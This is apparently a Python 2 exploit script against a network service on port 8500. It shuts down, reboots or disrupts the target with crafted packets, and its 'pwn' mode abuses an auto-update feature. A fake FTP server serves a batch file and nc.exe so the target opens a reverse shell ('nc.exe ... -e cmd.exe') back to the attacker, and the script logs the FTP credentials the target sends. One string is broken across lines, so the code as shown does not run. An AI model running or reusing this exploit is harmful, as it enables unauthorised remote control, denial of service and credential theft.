- #!/usr/bin/env python2
- # -*- coding: utf-8 -*-
- import sys
- import struct
- import time
- import socket
- from threading import Thread
- #
- # Change this IP to your public IP address.
- #
# Address the target is told to connect back to (FTP fetch in fake_ftpd,
# reverse shell in do_stuff). A private placeholder is hard-coded here.
PUBLIC_IP = "192.168.0.1"
#
# Don't forget to open ports 21 and 8501 in your
# OpenOffice.org firewall
#
SRV_PORT = 8500      # TCP port of the target service contacted by do_stuff()
FTP_PORT = 21        # port fake_ftpd.run() binds on all interfaces
SHELL_PORT = 8501    # port do_stuff() listens on for the connect-back shell
# Fixed 4-byte prefix of every request sent to SRV_PORT; a byte-exact
# network signature for this tool's traffic.
MAGIC = "\x15\x66\x00\x78"
# Command codes appended to MAGIC (one byte each, except STOP).
HALT = "\x65"
REBOOT = "\x66"
STOP = "\x70\x00\x00"
UPDATE = "\x82"
OK = "\x01"          # single status byte expected in reply to STOP and UPDATE
def usage (msg = None):
    """Print an optional error line and the command list, then exit.

    Exits with status 0 even when called with an error message.
    """
    if msg: print "Error: %s\n" % msg
    print "Usage: %s IP command" % sys.argv[0]
    print
    print "commands:"
    print "- halt shutdown the server"
    print "- reboot reboot the server"
    print "- stop stop P2P clients (eMule and Shareaza)"
    # NOTE(review): this string literal is broken across two lines in the
    # paste; as shown it is not valid Python.
    print "- pwn use a vulnerability in the Auto Update feature to
    get a remote shell"
    sys.exit(0)
class fake_ftpd(Thread):
    """Single-client FTP server thread started by the 'pwn' command.

    Implements just enough of the FTP dialogue (USER/PASS, PORT, RETR,
    NLST, CWD, TYPE, QUIT) to hand the connecting client the two
    in-memory files assembled in __init__. Only active-mode (PORT)
    transfers are handled, and the client's credentials are printed
    when PASS arrives.
    """
    def __init__ (self):
        Thread.__init__(self)
        self.s = None   # listening socket, created in run()
        # The binary is read from the working directory; a missing
        # ./nc.exe raises IOError here, before any network activity.
        f = open('./nc.exe', 'rb')
        nc = f.read()
        f.close()
        # Batch file the client is expected to run: renames the
        # transferred text file back to nc.exe and executes it with
        # a connect-back to PUBLIC_IP:SHELL_PORT.
        batch = "@echo off\r\n"
        batch += "move cmd_execute_update_cmd_file.txt nc.exe\r\n"
        batch += "nc.exe %s %s -e cmd.exe\r\n" % (PUBLIC_IP, SHELL_PORT)
        # Virtual file system served by RETR, keyed by the exact path
        # string the client sends (no normalisation).
        self.files = {
            'script/script_diff2/execute_update.bat': batch,
            'script/script_diff2/cmd_execute_update_cmd_file.txt': nc
        }
    def run (self):
        """Accept one FTP client and serve commands until QUIT or EOF."""
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # Binds every interface on FTP_PORT (21), which typically needs
        # elevated privileges.
        self.s.bind(("", FTP_PORT))
        self.s.listen(1)
        self.s.listen(0x1337)
        print "[+] Waiting for FTP connection..."
        conn, addr = self.s.accept()
        print "[!] FTP - %s connected!" % addr[0]
        # Distinctive greeting; a useful string to match in FTP traffic.
        conn.send("220 Welcome to my FTPd - Ready to pwn you!\r\n")
        while True:
            data = conn.recv(1024)
            if not data:
                break
            # One command per recv() is assumed; partial lines are not
            # buffered across reads.
            args = data.rstrip().split(' ')
            if data.startswith('CWD'):
                conn.send('250 CWD command successful.\r\n')
            elif data.startswith('TYPE'):
                conn.send('200 TYPE set.\r\n')
            elif data.startswith('USER'):
                conn.send('331 Password required.\r\n')
                username = data.split(' ')[1].rstrip()
            elif data.startswith('PASS'):
                # Any password is accepted; the pair is only printed.
                conn.send('230 User logged in.\r\n')
                password = data.split(' ')[1].rstrip()
                print "[!] TMG credentials: %s/%s" % (username, password)
            elif data.startswith('PORT'):
                # Active mode: the server connects out to the
                # h1,h2,h3,h4,p1,p2 address the client supplied.
                arg = args[1].split(',')
                ip = '.'.join(arg[:4])
                port = int(arg[4]) * 256 + int(arg[5])
                sdata = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sdata.connect((ip, port))
                conn.send('200 PORT command successful.\r\n')
            elif data.startswith('RETR'):
                conn.send('150 Opening BINARY mode data connection\r\n')
                # Unknown paths receive a literal 'file not found' body
                # on the data channel rather than an FTP error code.
                buf = self.files.get(args[1], 'file not found\r\n')
                sdata.send(buf)
                sdata.close()
                conn.send('226 Transfer complete\r\n')
                print "[+] File \"%s\" transfered..." % args[1]
            elif data.startswith('NLST'):
                conn.send('150 Here comes the directory listing.\r\n')
                # The listing echoes the requested name back instead of
                # enumerating self.files.
                if len(args) == 1:
                    listing = ''
                else:
                    listing = args[1]
                sdata.send(listing + '\r\n')
                sdata.close()
                conn.send('226 Directory send OK.\r\n')
            elif data.startswith('QUIT'):
                conn.send('221 Goodbye.\r\n')
                break
            else:
                conn.send('500 Unknown command.\r\n')
        conn.close()
def do_stuff (host, cmd):
    """Connect to host:SRV_PORT and issue one of halt/reboot/stop/pwn.

    halt and reboot send a packet and return; stop and pwn wait for a
    one-byte reply and compare it with OK. A failed connect is printed
    and the function returns; nothing is raised to the caller.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)   # covers connect() and the recv(1) calls below
    try:
        print "[+] Connecting to %s:%d..." % (host, SRV_PORT)
        s.connect((host, SRV_PORT))
    except Exception, e:
        print("[?] Error: %s" % e)
        s.close()
        return ;
    print "[+] Sending evil packet..."
    # Every request is the 4-byte MAGIC prefix followed by a command code.
    if cmd == 'halt':
        s.send(MAGIC + HALT)
        print "[!] Done!"
    elif cmd == 'reboot':
        s.send(MAGIC + REBOOT)
        print "[!] Done!"
    elif cmd == 'stop':
        s.send(MAGIC + STOP)
        data = s.recv(1)
        if data and data[0] == OK:
            print "[!] Done!"
        else:
            print "[!] Error :("
    elif cmd == 'pwn':
        # The fake FTP server is started before the UPDATE request so the
        # target has a listener to fetch from.
        ftpd = fake_ftpd()
        ftpd.daemon = True
        ftpd.start()
        # UPDATE payload: 4-byte IPv4 address, FTP_PORT run through
        # ntohs() and packed as a native-endian short, then two NUL bytes.
        command = socket.inet_aton(PUBLIC_IP) + struct.pack("h",
            socket.ntohs(FTP_PORT)) + "\x00\x00"
        s.send(MAGIC + UPDATE + command)
        data = s.recv(1)
        if data and data[0] == OK:
            # Wait for the connect-back shell, then relay stdin lines to it.
            s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s2.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s2.bind(("", SHELL_PORT))
            s2.listen(1)
            conn, addr = s2.accept()
            print "[!] SHELL - %s connected!" % addr[0]
            print conn.recv(4096)
            while True:
                cmd = raw_input()
                if cmd == "quit" or cmd == "exit":
                    break;
                conn.send(cmd + "\r\n")
                data = ""
                # The first chunk is read without a timeout; further chunks
                # are drained until one second of silence or a closed peer.
                conn.settimeout(None)
                data = conn.recv(1024)
                conn.settimeout(1)
                while True:
                    line = ""
                    try:
                        line = conn.recv(1024)
                    except socket.timeout:
                        break
                    if line == "":
                        break
                    data += line
                # First and last lines are dropped before printing;
                # presumably the echoed command and the trailing prompt.
                tab = data.split("\n")
                print "\n".join(tab[1:-1])
            conn.close()
        else:
            print "[!] Error :("
    s.close()
if __name__ == '__main__':
    # Two positional arguments are expected: target IP and command name.
    if len(sys.argv) < 3:
        usage("Not enough arguments")
    # Only "too few" is checked above; more than three argv entries make
    # this unpacking raise ValueError.
    (_, host, cmd) = sys.argv
    if cmd not in ['halt', 'reboot', 'stop', 'pwn']:
        usage('Invalid command ("%s")' % cmd)
    do_stuff(host, cmd)
    sys.exit(0)